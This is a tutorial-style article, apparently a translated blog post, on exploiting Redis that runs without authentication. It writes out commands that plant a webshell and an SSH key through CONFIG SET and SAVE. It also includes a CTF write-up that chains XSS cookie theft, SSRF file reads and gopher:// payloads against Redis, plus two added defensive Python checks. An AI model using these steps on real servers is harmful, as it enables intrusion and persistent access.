
Methods of unauthorized access to Redis

2025-02-25 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article walks through unauthorized access to Redis in detail, with illustrated steps and code. It is aimed at beginners.

Redis is a non-relational database that stores data as key-value pairs.

Redis is an open source, log-type key-value database written in ANSI C and released under the BSD license. It supports networking, can be memory-based or persistent, and provides APIs in multiple languages.

It is often called a data structure server because a value can be a string, a hash (map), a list, a set, or a sorted set.

Installation service

Windows

Download address: https://github.com/MSOpenTech/redis/releases

Test environment:

Operating system: Windows 7

IP: 192.168.107.144

Run from the command line:

redis-server.exe redis.conf

Then check the port.

Port 6379 (the Redis default port) is open.

Redis started successfully.

Ubuntu

Installation

sudo apt-get update
sudo apt-get install redis-server

Start the service

redis-server

Basic commands

Connect to Redis

redis-cli.exe -h 192.168.107.144

View the value of the key x

redis 192.168.107.144:6379> get x
""

Get all keys

redis 192.168.107.144:6379> keys *
1) "x"

Delete all keys

redis 192.168.107.144:6379> flushall

Exploitation

The local machine connects to the target machine with the telnet command.

Or connect with redis-cli.exe -h 192.168.107.144

Connected successfully

Enter info to get relevant information

You can see the redis version number and so on.
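The connection above succeeds without credentials because the server listens on a reachable interface with no password. As an added example (not from the original article), this sketch audits a redis.conf for the settings that allow it; the directive names are standard Redis ones that the article itself does not mention, and both configuration fragments are constructed.

```python
import shlex

# Constructed redis.conf fragments: an exposed setup like the article's target
# and a hardened counterpart (assumed values, not taken from the page).
EXPOSED_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
"""
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass "constructed-long-random-secret"
rename-command CONFIG ""
"""

def parse_conf(text):
    """Collect directives as {name: [argument lists]}; names are case-insensitive."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = shlex.split(line)
        conf.setdefault(name.lower(), []).append(args)
    return conf

def audit(text):
    """Return the findings that leave an instance open to unauthenticated access."""
    conf = parse_conf(text)
    findings = []
    binds = [a for args in conf.get("bind", []) for a in args]
    # No bind directive at all means Redis listens on every interface.
    if not binds or any(a.lstrip("-") in ("0.0.0.0", "*", "::", "::*") for a in binds):
        findings.append("listens on all interfaces")
    if not any(args and args[0] for args in conf.get("requirepass", [])):
        findings.append("no requirepass set")
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode disabled")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command not renamed or disabled")
    return findings

if __name__ == "__main__":
    print("exposed: ", audit(EXPOSED_CONF))
    print("hardened:", audit(HARDENED_CONF))
```

On Redis 6 and later, ACL rules for the default user can replace requirepass and rename-command; this check does not read ACL files.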

Exploitation methods

Write a one-line webshell

Write an ssh public key

Writing a webshell

// set the value of x
redis 192.168.107.144:6379> set x ""
redis 192.168.107.144:6379> config set dbfilename test.php
redis 192.168.107.144:6379> config set dir D:/WWW/PHPTutorial/WWW
redis 192.168.107.144:6379> save

The file is successfully written to the target machine.

Writing an ssh public key

Generate a key pair locally

root@ip-172-31-14-115:~/.ssh# ssh-keygen -t rsa

Then write the ssh public key to the target machine.

root@ip-172-31-14-115:/etc/redis# redis-cli -h 192.168.107.144
192.168.107.144:6379> config set dir /root/.ssh # set the local storage file directory
192.168.107.144:6379> config set dbfilename pub_keys # set the local storage file name
192.168.107.144:6379> set x "xxxx" # write your ssh public key to the x key (xxxx is your own generated ssh public key)
192.168.107.144:6379> save

Then connect over ssh locally

root@ip-172-31-14-115:~/.ssh# ssh -i id_rsa root@192.168.107.144

It works.
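Both the webshell write and the ssh key write above follow the same pattern: CONFIG SET on dir or dbfilename, then SAVE. As an added example (not part of the original article), this detector scans text in the format printed by redis-cli monitor for that sequence; the sample lines are constructed and reuse the directory and file name from the ssh example, and the client addresses are assumptions.

```python
import re
import shlex

# Constructed sample in the `redis-cli monitor` output format:
# <unix-time> [<db> <client-addr>] "<arg>" "<arg>" ...
SAMPLE_MONITOR = '''\
1700000000.100001 [0 10.0.0.5:50112] "get" "session:42"
1700000001.200002 [0 203.0.113.7:41822] "set" "x" "constructed-value"
1700000002.300003 [0 203.0.113.7:41822] "config" "set" "dir" "/root/.ssh"
1700000003.400004 [0 203.0.113.7:41822] "CONFIG" "SET" "dbfilename" "pub_keys"
1700000004.500005 [0 203.0.113.7:41822] "save"
1700000005.600006 [0 10.0.0.5:50112] "save"
'''

LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[\d+ (?P<client>\S+)\] (?P<cmd>.+)$')
PERSIST = {"save", "bgsave"}        # commands that write the dump file
WATCHED = {"dir", "dbfilename"}     # settings that decide where it lands

def find_file_write_abuse(monitor_text):
    """Return one alert per client that repoints dir/dbfilename and then saves."""
    pending = {}   # client IP -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for raw in monitor_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        args = shlex.split(m["cmd"])
        if not args:
            continue
        verb = [a.lower() for a in args[:3]]      # command names are case-insensitive
        client = m["client"].rsplit(":", 1)[0]    # drop the ephemeral source port
        if verb[:2] == ["config", "set"] and len(args) >= 4 and verb[2] in WATCHED:
            pending.setdefault(client, {})[verb[2]] = args[3]
        elif verb[0] in PERSIST and client in pending:
            alerts.append({"client": client, "ts": float(m["ts"]), **pending.pop(client)})
    return alerts

if __name__ == "__main__":
    for alert in find_file_write_abuse(SAMPLE_MONITOR):
        print(alert)
```

A SAVE from a client that never changed dir or dbfilename, like the last sample line, produces no alert.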

Redis in CTF (XSS -> SSRF & Gopher -> Redis)

The challenge

Challenge address: https://hackme.inndy.tw/scoreboard/

xssme

Leak

Leaked source code is discovered through robots.txt.

It is an encrypted config.php.

Stealing the cookie with XSS

The interface after registration and login

Sending an email requires verification.

Write a script to pass the verification.

Some input is then filtered.

Testing with img

onload is filtered as well.

Note one detail here: a space followed by onerror is filtered. Guessing that the filter only triggers when onerror is preceded by a space, construct a payload with onerror and no space and try it.

Then steal the cookie; the cookie is captured successfully.

Decode the SESSION

PHPSESSID=rmibdo13ohquscgsuphitr9cp4; FLAG_XSSME=FLAG{Sometimes, XSS can be critical vulnerability alert (1)}; FLAG_2=IN_THE_REDIS

xssrf leak

From the cookie of the previous challenge: FLAG_2=IN_THE_REDIS

The environment is the same.

Having obtained the administrator's cookie, log in with it.

If a local login is required, try forging an XF header.

Changing several IP headers did not help.

So, recalling the earlier challenge, use XSS to grab the source code of the administrator page directly.

I don't know why the XSS platform did not receive it, so I switched to another platform.

Using the payload

innerHTML turned out to be filtered.

So HTML-encode it.

The request was received.

Decode it and save it locally.

SSRF reads config.php

Guess that the send request function is vulnerable to SSRF.

The VPS received the request.

Decode:

... URL Send Request

The POST request takes a url parameter.

Try to read a file

Successfully read /etc/passwd

So read the config.php found earlier.

xssrf redis (SSRF + gopher to get the flag)

According to the hint in the flag, the Redis port is 25566.

Send requests to Redis through gopher

Successfully obtained info

Check the keys.

xmlhttp.send("url=gopher://127.0.0.1:25566/_key%2520*")

The result is read.

Since there is a flag key, read the value of the key directly.

xmlhttp.send("url=gopher://127.0.0.1:25566/_get%2520flag")

The type does not match.

So check the type.

xmlhttp.send("url=gopher://127.0.0.1:25566/_type%2520flag")

It is a list, so get the length of the list.

xmlhttp.send("url=gopher://127.0.0.1:25566/_LLEN%2520flag")

Then get all the elements

xmlhttp.send("url=gopher://127.0.0.1:25566/_LRANGE%2520flag%25200%252053")

Then write a script.

# the list elements come back in reverse order, so reverse the string
flag = "}tiolpxe ot ysae si noitacitnehtua tuohtiw sideR{GALF"
result = flag[::-1]
print(result)

Finally, the flag: FLAG{Redis without authentication is easy to exploit}

This concludes the methods of unauthorized access to Redis. I hope the content above is helpful and that you learn more from it. If you like this article, feel free to share it so that more people can see it.
